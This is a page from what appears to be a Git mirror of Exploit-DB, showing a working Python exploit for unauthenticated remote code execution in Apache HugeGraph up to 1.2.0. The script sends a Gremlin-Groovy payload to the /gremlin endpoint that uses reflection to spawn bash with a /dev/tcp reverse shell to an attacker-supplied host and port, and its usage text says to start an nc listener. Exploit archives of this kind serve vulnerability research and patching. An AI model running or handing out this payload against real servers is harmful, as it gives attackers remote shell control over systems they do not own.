bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/52149.py
Exploit-DB 762197db08 DB: 2025-04-10 
10 changes to exploits/shellcodes/ghdb

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Artica Proxy 4.50 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

DocsGPT 0.12.0 - Remote Code Execution
2025-04-10 00:16:32 +00:00

56 lines
No EOL
2.6 KiB
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-202427348
from requests import Request, Session
import sys
import json
def title():
print('''
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-202427348/exploit.py
''')
def exploit(url, lhost, lport):
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
headers = {
'Content-Type': 'application/json'}
s = Session()
url = url + "/gremlin"
req = Request('POST', url, json=payload, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15)
print(prepped.headers)
print(url)
print(resp.headers)
print(payload)
print(resp.status_code)
print(resp.text)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Reference in a new issue View git blame Copy permalink